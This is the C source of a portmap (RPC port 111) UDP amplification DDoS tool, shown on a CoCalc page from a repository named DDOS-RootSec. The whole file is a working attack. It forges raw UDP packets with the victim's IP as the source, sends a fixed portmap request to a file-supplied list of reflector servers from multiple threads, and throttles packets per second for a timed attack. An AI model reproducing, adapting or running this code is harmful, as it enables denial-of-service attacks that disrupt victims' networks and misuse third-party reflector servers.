CoCalc -- zudp_attack

GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/DDOS Scripts/AMP Methods/PORTMAP Amplification/zudp_attack_script.c
⁴⁶²² views
1
#include <time.h>
2
#include <pthread.h>
3
#include <unistd.h>
4
#include <stdio.h>
5
#include <stdlib.h>
6
#include <string.h>
7
#include <sys/socket.h>
8
#include <netinet/ip.h>
9
#include <netinet/udp.h>
10
#include <arpa/inet.h>
11
#define MAX_PACKET_SIZE 8192
12
#define PHI 0x9e3779b9
13
static uint32_t Q[4096], c = 362436;
14
struct list
15
{
16
	struct sockaddr_in data;
17
	struct list *next;
18
	struct list *prev;
19
};
20
struct list *head;
21
volatile int limiter;
22
volatile unsigned int pps;
23
volatile unsigned int sleeptime = 100;
24
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
25
void init_rand(uint32_t x)
26
{
27
	int i;
28
	Q[0] = x;
29
	Q[1] = x + PHI;
30
	Q[2] = x + PHI + PHI;
31
	for (i = 3; i < 4096; i++)
32
	{
33
	Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
34
	}
35
}
36
uint32_t rand_cmwc(void)
37
{
38
	uint64_t t, a = 18782LL;
39
	static uint32_t i = 4095;
40
	uint32_t x, r = 0xfffffffe;
41
	i = (i + 1) & 4095;
42
	t = a * Q[i] + c;
43
	c = (t >> 32);
44
	x = t + c;
45
	if (x < c) {
46
	x++;
47
	c++;
48
	}
49
	return (Q[i] = r - x);
50
}
51
unsigned short csum (unsigned short *buf, int nwords)
52
{
53
	unsigned long sum = 0;
54
	for (sum = 0; nwords > 0; nwords--)
55
	sum += *buf++;
56
	sum = (sum >> 16) + (sum & 0xffff);
57
	sum += (sum >> 16);
58
	return (unsigned short)(~sum);
59
}
60
void setup_ip_header(struct iphdr *iph)
61
{
62
	iph->ihl = 5;
63
	iph->version = 4;
64
	iph->tos = 0;
65
	iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 50;
66
	iph->id = htonl(54321);
67
	iph->frag_off = 0;
68
	iph->ttl = MAXTTL;
69
	iph->protocol = IPPROTO_UDP;
70
	iph->check = 0;
71
	iph->saddr = inet_addr("192.168.3.100");
72
}
73
void setup_udp_header(struct udphdr *udph)
74
{
75
	udph->source = htons(5678);
76
        udph->dest = htons(111);
77
        udph->check = 0;
78
        memcpy((void *)udph + sizeof(struct udphdr), "\x65\x72\x0a\x37\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 50);
79
        udph->len=htons(sizeof(struct udphdr) + 50);
80
}
81
void *flood(void *par1)
82
{
83
	struct thread_data *td = (struct thread_data *)par1;
84
	char datagram[MAX_PACKET_SIZE];
85
	struct iphdr *iph = (struct iphdr *)datagram;
86
	struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
87
	struct sockaddr_in sin = td->sin;
88
	struct  list *list_node = td->list_node;
89
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
90
	if(s < 0){
91
	fprintf(stderr, "error. got r00t?\n");
92
	exit(-1);
93
	}
94
	init_rand(time(NULL));
95
	memset(datagram, 0, MAX_PACKET_SIZE);
96
	setup_ip_header(iph);
97
	setup_udp_header(udph);
98
	udph->source = htons(rand() % 65535 - 1026);
99
	iph->saddr = sin.sin_addr.s_addr;
100
	iph->daddr = list_node->data.sin_addr.s_addr;
101
	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
102
	int tmp = 1;
103
	const int *val = &tmp;
104
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
105
	fprintf(stderr, "error. u dun goofed.\n");
106
	exit(-1);
107
	}
108
	init_rand(time(NULL));
109
	register unsigned int i;
110
	i = 0;
111
	while(1){
112
	sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
113
	list_node = list_node->next;
114
	iph->daddr = list_node->data.sin_addr.s_addr;
115
	iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
116
	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
117
	pps++;
118
	if(i >= limiter)
119
	{
120
	i = 0;
121
	usleep(sleeptime);
122
	}
123
	i++;
124
	}
125
}
126
int main(int argc, char *argv[ ])
127
{
128
	if(argc < 5){
129
	fprintf(stderr, "Invalid parameters!\n");
130
	fprintf(stdout, "Usage: %s [IP] [file] [threads] [limiter] [time]\n", argv[0]);
131
	exit(-1);
132
	}
133
	srand(time(NULL));
134
	int i = 0;
135
	head = NULL;
136
	fprintf(stdout, "Opening sockets...\n");
137
	int max_len = 128;
138
	char *buffer = (char *) malloc(max_len);
139
	buffer = memset(buffer, 0x00, max_len);
140
	int num_threads = atoi(argv[3]);
141
	int maxpps = atoi(argv[4]);
142
	limiter = 0;
143
	pps = 0;
144
	int multiplier = 20;
145
	FILE *list_fd = fopen(argv[2],  "r");
146
	while (fgets(buffer, max_len, list_fd) != NULL) {
147
	if ((buffer[strlen(buffer) - 1] == '\n') ||
148
	(buffer[strlen(buffer) - 1] == '\r')) {
149
	buffer[strlen(buffer) - 1] = 0x00;
150
	if(head == NULL)
151
	{
152
	head = (struct list *)malloc(sizeof(struct list));
153
	bzero(&head->data, sizeof(head->data));
154
	head->data.sin_addr.s_addr=inet_addr(buffer);
155
	head->next = head;
156
	head->prev = head;
157
	} else {
158
	struct list *new_node = (struct list *)malloc(sizeof(struct list));
159
	memset(new_node, 0x00, sizeof(struct list));
160
	new_node->data.sin_addr.s_addr=inet_addr(buffer);
161
	new_node->prev = head;
162
	new_node->next = head->next;
163
	head->next = new_node;
164
	}
165
	i++;
166
	} else {
167
	continue;
168
	}
169
	}
170
	struct list *current = head->next;
171
	pthread_t thread[num_threads];
172
	struct sockaddr_in sin;
173
	sin.sin_family = AF_INET;
174
	sin.sin_addr.s_addr = inet_addr(argv[1]);
175
	struct thread_data td[num_threads];
176
	for(i = 0;i<num_threads;i++){
177
	td[i].thread_id = i;
178
	td[i].sin= sin;
179
	td[i].list_node = current;
180
	pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
181
	}
182
	fprintf(stdout, "Sending attack..\n");
183
	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
184
	{
185
	usleep((1000/multiplier)*1000);
186
	if((pps*multiplier) > maxpps)
187
	{
188
	if(1 > limiter)
189
	{
190
	sleeptime+=100;
191
	} else {
192
	limiter--;
193
	}
194
	} else {
195
	limiter++;
196
	if(sleeptime > 25)
197
	{
198
	sleeptime-=25;
199
	} else {
200
	sleeptime = 0;
201
	}
202
	}
203
	pps = 0;
204
	}
205
	return 0;
206
}
207
Product

Resources

Company
